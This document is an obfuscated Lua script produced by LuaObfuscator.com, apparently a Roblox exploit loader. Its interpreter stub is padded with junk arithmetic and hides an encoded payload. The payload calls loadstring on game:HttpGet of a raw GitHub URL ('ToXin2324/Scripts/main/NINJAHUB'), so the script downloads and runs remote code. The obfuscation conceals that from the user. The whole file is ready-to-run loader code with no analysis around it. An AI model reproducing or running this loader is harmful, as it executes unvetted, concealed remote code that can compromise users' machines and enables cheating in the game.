--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39==(538 -(296 + 239))) then v46=nil;while true do local v84=0 -0 ;local v85;while true do if (v84==0) then v85=0;while true do if (v85~=0) then else local v110=1302 -(792 + 510) ;local v111;while true do if (v110~=0) then else v111=0;while true do if (v111~=1) then else v85=1 + 0 ;break;end if (v111==(0 -0)) then local v123=0;while true do if (v123==1) then v111=1 + 0 ;break;end if ((959 -(209 + 750))~=v123) then else if (v40~=(396 -(177 + 217))) then else local v128=0;while true do if (v128==0) then for v152=1351 -(1176 + 174) ,v45 do local v153=0;local v154;local v155;local v156;local v157;while true do if (v153~=(1840 -(400 + 1439))) then else local v173=0;while true do if (v173==(0 -0)) then v156=nil;v157=nil;v173=1;end if ((3 -2)==v173) then v153=2;break;end end end if (v153==2) then while true do if (v154==(0 -0)) then local v177=0 + 0 ;while true do if (v177~=(1 + 0)) then else v154=1;break;end if (v177==(0 + 0)) then local v182=0;while true do if (v182==(0 -0)) then v155=919 -(200 + 719) ;v156=nil;v182=1;end if ((800 -(71 + 728))==v182) then v177=1;break;end end end end end if (v154==1) then v157=nil;while true do if (v155==0) then local v183=0;while true do if (v183==1) then v155=1 + 0 ;break;end if (v183~=0) then else local v187=0;while true do if (v187~=(976 -(514 + 462))) then else local v195=1461 -(946 + 515) ;while true do if (v195==0) then v156=v22();v157=nil;v195=1 + 0 ;end if (v195~=1) then else v187=1586 -(538 + 1047) ;break;end end end if (v187==1) then v183=1;break;end end end end end if (v155==(2 -1)) then if (v156==(374 -(315 + 58))) then v157=v22()~=0 ;elseif (v156==(815 -(677 + 136))) then v157=v25();elseif (v156==3) then v157=v26();end v46[v152]=v157;break;end end break;end end break;end if (v153==0) then v154=0;v155=nil;v153=1;end end end v44[3]=v22();v128=1;end if (v128==1) then for v158=1 + 0 ,v24() do local v159=0;local v160;local v161;local v162;local v163;while true do if (v159==1) then v162=nil;v163=nil;v159=2;end if (v159==(518 -(359 + 157))) then while true do if (v160==0) then v161=0;v162=nil;v160=1 + 0 ;end if (v160==(1 + 0)) then v163=nil;while true do if (v161==(302 -(10 + 292))) then v162=0;v163=nil;v161=1336 -(912 + 423) ;end if ((4 -3)==v161) then while true do if (v162~=0) then else v163=v22();if (v21(v163,308 -(64 + 243) ,717 -(42 + 674) )==0) then local v190=0 -0 ;local v191;local v192;local v193;local v194;while true do if (v190==(1 + 1)) then while true do if (v191==2) then if (v21(v193,3 -2 ,1 + 0 )~=(2 -1)) then else v194[2]=v46[v194[61 -(48 + 11) ]];end if (v21(v193,2,257 -(210 + 45) )~=1) then else v194[9 -6 ]=v46[v194[1794 -(1119 + 672) ]];end v191=3;end if (v191~=(1171 -(53 + 1117))) then else local v196=0 + 0 ;local v197;while true do if (v196==0) then v197=0 -0 ;while true do if (v197~=(1456 -(315 + 1141))) then else local v207=1183 -(1153 + 30) ;while true do if (v207~=(0 + 0)) then else v194={v23(),v23(),nil,nil};if (v192==(1579 -(285 + 1294))) then local v208=1046 -(267 + 779) ;local v209;local v210;while true do if (v208==(1 -0)) then while true do if (v209~=(0 + 0)) then else v210=0;while true do if (v210==0) then v194[3]=v23();v194[1246 -(1108 + 134) ]=v23();break;end end break;end end break;end if (v208==0) then local v212=0;while true do if (v212==(1 + 0)) then v208=1;break;end if (v212~=(446 -(304 + 142))) then else v209=0;v210=nil;v212=153 -(101 + 51) ;end end end end elseif (v192==(465 -(384 + 80))) then v194[1 + 2 ]=v24();elseif (v192==2) then v194[8 -5 ]=v24() -(2^(46 -30)) ;elseif (v192~=3) then else local v214=0;local v215;while true do if (v214==0) then v215=0;while true do if (v215~=0) then else v194[3]=v24() -(2^16) ;v194[4]=v23();break;end end break;end end end v207=3 -2 ;end if (v207==(1100 -(918 + 181))) then v197=999 -(99 + 899) ;break;end end end if (1==v197) then v191=4 -2 ;break;end end break;end end end if (v191==(1788 -(795 + 990))) then if (v21(v193,3,3)==(1 + 0)) then v194[2 + 2 ]=v46[v194[4]];end v41[v158]=v194;break;end if (v191==(0 + 0)) then local v199=0;local v200;while true do if (v199==(0 -0)) then v200=0 -0 ;while true do if (v200~=1) then else v191=1;break;end if (v200==0) then v192=v21(v163,1850 -(193 + 1655) ,1691 -(725 + 963) );v193=v21(v163,7 -3 ,6);v200=712 -(586 + 125) ;end end break;end end end end break;end if (v190==(0 -0)) then v191=0;v192=nil;v190=1 + 0 ;end if (v190==(2 -1)) then v193=nil;v194=nil;v190=2;end end end break;end end break;end end break;end end break;end if (v159==(0 -0)) then v160=0 + 0 ;v161=nil;v159=1;end end end v40=10 -7 ;break;end end end if (v40~=0) then else local v129=652 -(502 + 150) ;local v130;while true do if (v129~=0) then else v130=0;while true do if (v130==0) then local v166=0 -0 ;while true do if (v166==(690 -(653 + 36))) then v130=1 -0 ;break;end if (v166==0) then v41={};v42={};v166=1;end end end if (v130~=(1 + 0)) then else v43={};v40=876 -(458 + 417) ;break;end end break;end end end v123=1 -0 ;end end end end break;end end end if (v85~=(189 -(70 + 118))) then else if (v40~=(2 -1)) then else local v116=0 -0 ;local v117;local v118;while true do if (v116~=(295 -(132 + 162))) then else while true do if (v117==0) then v118=0;while true do if (v118==(1 + 0)) then v46={};v40=197 -(32 + 163) ;break;end if (0==v118) then local v131=0;while true do if ((3 -2)==v131) then v118=1;break;end if (v131==0) then v44={v41,v42,nil,v43};v45=v24();v131=1;end end end end break;end end break;end if (v116~=0) then else v117=0 + 0 ;v118=nil;v116=1089 -(281 + 807) ;end end end if (v40==3) then local v119=0;local v120;while true do if (v119==(0 + 0)) then v120=0;while true do local v124=0;while true do if (v124~=(0 + 0)) then else if (v120~=(1 -0)) then else return v44;end if (v120==(0 + 0)) then for v147=1,v24() do v42[v147-1 ]=v29();end for v149=1,v24() do v43[v149]=v24();end v120=1 + 0 ;end break;end end end break;end end end break;end end break;end end end break;end if ((0 + 0)==v39) then local v75=0;local v76;while true do if (v75==0) then v76=0;while true do if (v76==0) then local v103=1150 -(474 + 676) ;while true do if (v103==1) then v76=1;break;end if (0==v103) then v40=0 -0 ;v41=nil;v103=1 + 0 ;end end end if (v76==(3 -2)) then v39=1;break;end end break;end end end if (v39==(1 + 1)) then local v77=0;local v78;while true do if (v77==0) then v78=0;while true do if (v78==(4 -3)) then v39=8 -5 ;break;end if (v78==0) then local v104=0;while true do if ((2 -1)==v104) then v78=1707 -(486 + 1220) ;break;end if (v104==0) then v44=nil;v45=nil;v104=1;end end end end break;end end end if (v39==(4 -3)) then local v79=1822 -(1537 + 285) ;local v80;while true do if (0==v79) then v80=0 -0 ;while true do if (v80==(1629 -(411 + 1218))) then v42=nil;v43=nil;v80=1 + 0 ;end if (v80~=(1 + 0)) then else v39=74 -(51 + 21) ;break;end end break;end end end end end;v18=5;end if (v18==5) then v30=nil;v30=function(v31,v32,v33)local v47=0;local v48;local v49;local v50;while true do if (0==v47) then v48=v31[1];v49=v31[2];v47=1;end if (v47==1) then v50=v31[3];return function(...)local v86=0;local v87;local v88;local v89;local v90;local v91;while true do if (2==v86) then v91=nil;v91=function()local v93=v48;local v94=v49;local v95=v50;local v96=v28;local v97={};local v98={};local v99={};for v105=1135 -(325 + 810) ,v90 do if ((v105>=v95) or ((7252 -4955)==(5618 -(391 + 310)))) then v97[v105-v95 ]=v89[v105 + 1 ];else v99[v105]=v89[v105 + 1 + 0 ];end end local v100=(v90-v95) + 1 + 0 ;local v101;local v102;while true do local v106=1495 -(517 + 978) ;local v107;while true do if ((v106==(0 + 0)) or ((5350 -(682 + 577 + 170))<=(2179 + 130 + 68))) then v107=0 -0 ;while true do if (((84 + 492)<=(3853 -(109 + 743))) and ((205 -(134 + (585 -(380 + 134))))==v107)) then v101=v93[v87];v102=v101[1 + 0 ];v107=1;end if (((6433 -3065)<=(5571 -(339 + 340))) and (v107==(1 + 0))) then if (((6747 -3935)>=(2034 -1233)) and (v102<=(973 -((686 -(89 + 393)) + 767)))) then if (((4626 -(308 + 139))==(4863 -(24 + 660))) and (v102<=(0 + 0))) then local v125=0 + 0 ;local v126;local v127;while true do if (((19131 -14888)>=(2872 -(108 + 446 + 773))) and ((88 -(34 + 54))==v125)) then v126=0 -(0 -0) ;v127=nil;v125=1 + 0 ;end if (((413 -(355 + 57))==v125) or ((4989 -(858 + 611))<((2029 -(188 + 285)) -(2772 -(108 + 1852))))) then while true do if (((4001 -((2283 -(1864 + 78)) + 56))>=(2392 -(1534 + 108))) and (v126==((0 -0) -0))) then v127=v101[2 + 0 ];v99[v127]=v99[v127](v13(v99,v127 + (660 -(46 + 613)) ,v88));break;end end break;end end elseif (((1322 -(26 + 95))<=((3056 -(148 + 186)) + 451)) and (v102>(2 -1))) then v99[v101[2 + 0 ]]=v33[v101[1488 -(967 + 518) ]];else v99[v101[424 -(56 + (1180 -814)) ]]();end elseif ((v102<=((1991 -1106) -(525 + (991 -635)))) or (((1426 -817) + (3109 -(9 + 354)))<=((5426 -(34 + 268)) -(961 + 871)))) then if ((v102==(895 -(640 + 252))) or ((11427 -7400)<=(4073 -1863))) then local v134=1738 -(830 + 908) ;local v135;local v136;local v137;while true do if (((4857 -2600)==(436 + 1821)) and (v134==(0 -0))) then v135=0 -0 ;v136=nil;v134=1234 -(991 + 242) ;end if (((199 + 1832)<(4833 -(20 + 13))) and (v134==(1591 -(1269 + 321)))) then v137=nil;while true do if ((v135==(1308 -(1120 + 188))) or ((136 + 145)==(2473 -(190 + 385)))) then v136=v101[1 + 1 ];v137=v99[v101[7 -4 ]];v135=3 -2 ;end if ((((2245 -794) + 108)>=(1934 -(148 + 1038))) and (v135==(1 + 0))) then v99[v136 + (4 -3) ]=v137;v99[v136]=v137[v101[12 -8 ]];break;end end break;end end else local v138=228 -(194 + 34) ;local v139;local v140;local v141;local v142;local v143;local v144;while true do if ((((35 -25) -7)==v138) or ((220 -137)>=(1454 + 63))) then while true do if ((3696<(1114 + 1158 + 2478)) and (v139==0)) then v140=0 -0 ;v141=nil;v139=1628 -(395 + 1232) ;end if ((v139==((9 -7) + 0 + 0)) or ((1681 -(600 + 394))>=(12656 -8257))) then v144=nil;while true do if ((v140==(1 + 0)) or ((3292 -(1521 + 420))<=(1374 -(93 + 7)))) then local v174=(0 + 0) -0 ;local v175;while true do if (((111 + 1615)<=(780 + 2150)) and ((0 + (0 -0))==v174)) then v175=657 -(618 + 39) ;while true do if ((v175==(1087 -(1009 + 78))) or ((1138 + 1955)<=(104 + 81))) then local v185=230 -(213 + 17) ;while true do if (((1895 + 724)<=(4524 -(353 + 1177))) and (v185==(2 -1))) then v175=690 -(193 + 496) ;break;end if (((14334 -9601)>=(4816 -(1797 -(311 + 45)))) and (v185==(1887 -(207 + 1680)))) then v88=(v143 + v141) -(1 + 0 + 0) ;v144=55 -(54 + 1) ;v185=(1380 -(477 + 902)) -0 ;end end end if ((v175==(30 -(18 + 11))) or ((1370 -(523 + 816))==((6471 -4616) -1408))) then v140=1015 -(689 + 324) ;break;end end break;end end end if ((v140==(0 + 0)) or (4401<(8398 -4554))) then local v176=1768 -((2142 -1281) + 907) ;while true do if (((2229 -(879 + 781))<=(2682 -1325)) and (v176==((554 -(153 + 398)) -2))) then v140=1 -0 ;break;end if ((v176==(0 + 0)) or (((2012 -1351) + 1001)>(5927 -(950 + 444)))) then local v181=0 + 0 ;while true do if (((2432 -1772)<(3705 -(357 + 752))) and (v181==(0 -0))) then v141=v101[1303 -(859 + 442) ];v142,v143=v96(v99[v141](v13(v99,v141 + 1 ,v101[7 -4 ])));v181=3 -2 ;end if ((v181==(1 + 0)) or (((3404 -1504) -602)==((7026 -(424 + 1013)) -(26 + 1338)))) then v176=1 + 0 ;break;end end end end end if (((5806 -1988)>(435 + 243 + 129)) and (v140==2)) then for v178=v141,v88 do local v179=1878 -(1113 + 765) ;local v180;while true do if (((3193 -1280)>(15 + 718)) and (v179==(0 + 0))) then v180=1003 -(747 + 256) ;while true do if ((4391<(4802 + 47)) and (v180==(323 -(186 + 137)))) then v144=v144 + 1 + (0 -0) ;v99[v178]=v142[v144];break;end end break;end end end break;end end break;end if ((1552>(4274 -2951)) and (v139==(1 + 0))) then local v172=0 + 0 ;while true do if ((v172==(0 -0)) or ((767 + 2777)==(27 + 222))) then v142=nil;v143=nil;v172=2 -1 ;end if (((3305 -(429 + 1180))==(5644 -3948)) and (v172==(1796 -(753 + 1042)))) then v139=1470 -(936 + 532) ;break;end end end end break;end if (((718 + 1393)<((4867 -(279 + 628)) -(266 + 47 + 137))) and (((0 + 0) -0)==v138)) then v139=0 + 0 ;v140=nil;v138=1 + 0 ;end if ((v138==(4 -(819 -(552 + 265)))) or ((4095 -2335)<(252 + 44))) then v143=nil;v144=nil;v138=7 -4 ;end if ((v138==(1 + 0 + 0)) or ((504 + 147)==((2306 -(104 + 11)) -((268 -150) + 155)))) then v141=nil;v142=nil;v138=1 + 1 ;end end end elseif (((5747 -(835 + 18 + 12))>=1086) and (v102>5)) then v99[v101[3 -1 ]]=v101[2 + 1 ];else do return;end end v87=v87 + 1 + 0 ;break;end end break;end end end end;v86=3;end if (v86==0) then v87=1;v88= -1;v86=1;end if (v86==1) then v89={...};v90=v12("#",...) -1 ;v86=2;end if (v86==3) then A,B=v28(v11(v91));if  not A[1] then local v108=0;local v109;while true do if (v108==0) then v109=v31[4][v87] or "?" ;error("Script error at ["   .. v109   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end break;end end end;end end end;return v30(v29(),{},v17)(...);end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v34)if (v1(v34,2)==79) then local v68=0;while true do if (v68==0) then v20=v0(v3(v34,1,1));return "";end end else local v69=0;local v70;while true do if (v69==0) then v70=v2(v0(v34,16));if v20 then local v92=v5(v70,v20);v20=nil;return v92;else return v70;end break;end end end end);v21=nil;v18=1;end if (v18==1) then v21=function(v35,v36,v37)if v37 then local v71=0 + 0 ;local v72;while true do if (v71==0) then v72=(v35/((1 + 1)^(v36-(1 -0))))%((496 -(369 + (573 -(195 + 253))))^(((v37-(1 -0)) -(v36-1)) + 1 + 0)) ;return v72-(v72%(1860 -(77 + 1782))) ;end end else local v73=2^(v36-(1259 -(39 + 1219))) ;return (((v35%(v73 + v73))>=v73) and (325 -((240 -141) + 225))) or (0 -0) ;end end;v22=nil;v22=function()local v51=v1(v16,v19,v19);v19=v19 + 1 ;return v51;end;v23=nil;v18=2;end if (3==v18) then v25=function()local v52=v24();local v53=v24();local v54=1;local v55=(v21(v53,1 -0 ,20) * ((1144 -(927 + 215))^(1341 -(386 + 923)))) + v52 ;local v56=v21(v53,166 -(78 + 67) ,707 -((2029 -(1209 + 554)) + 410) );local v57=((v21(v53,23 + 9 )==((5444 -3515) -(540 + 1388))) and  -((261 -(13 + 247)) -0)) or (3 -2) ;if (v56==(1349 -(873 + 476))) then if (v55==(356 -(241 + 115))) then return v57 * 0 ;else v56=1;v54=0 -0 ;end elseif (v56==(3912 -1865)) then return ((v55==(0 + 0)) and (v57 * (((504 -(114 + 389)) + 0)/((1814 -(906 + 908)) -0)))) or (v57 * NaN) ;end return v8(v57,v56-(1749 -726) ) * (v54 + (v55/((65 -(38 + 10 + 15))^(17 + 35)))) ;end;v26=nil;v26=function(v38)local v58;if  not v38 then local v74=1818 -(1548 + 270) ;while true do if ((0 + 0)==v74) then v38=v24();if (v38==(0 -(0 -0))) then return "";end break;end end end v58=v3(v16,v19,(v19 + v38) -(1 + 0) );v19=v19 + v38 ;local v59={};for v66=1 + 0 , #v58 do v59[v66]=v2(v1(v3(v58,v66,v66)));end return v6(v59);end;v27=v24;v18=4;end if (v18==2) then v23=function()local v60,v61=v1(v16,v19,v19 + 2 );v19=v19 + 1 + 1 ;return (v61 * (650 -394)) + v60 ;end;v24=nil;v24=function()local v62,v63,v64,v65=v1(v16,v19,v19 + 1 + 2 + 0 );v19=v19 + 2 + 2 ;return (v65 * (16778106 -(325 + 565))) + (v64 * (31936 + 33600)) + (v63 * (608 -352)) + v62 ;end;v25=nil;v18=3;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403413O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F546F58696E323332342F536372697074732F6D61696E2F4E494E4A4148554200083O0012023O00013O001202000100023O002003000100010003001206000300044O0004000100039O0000022O00013O000100012O00053O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
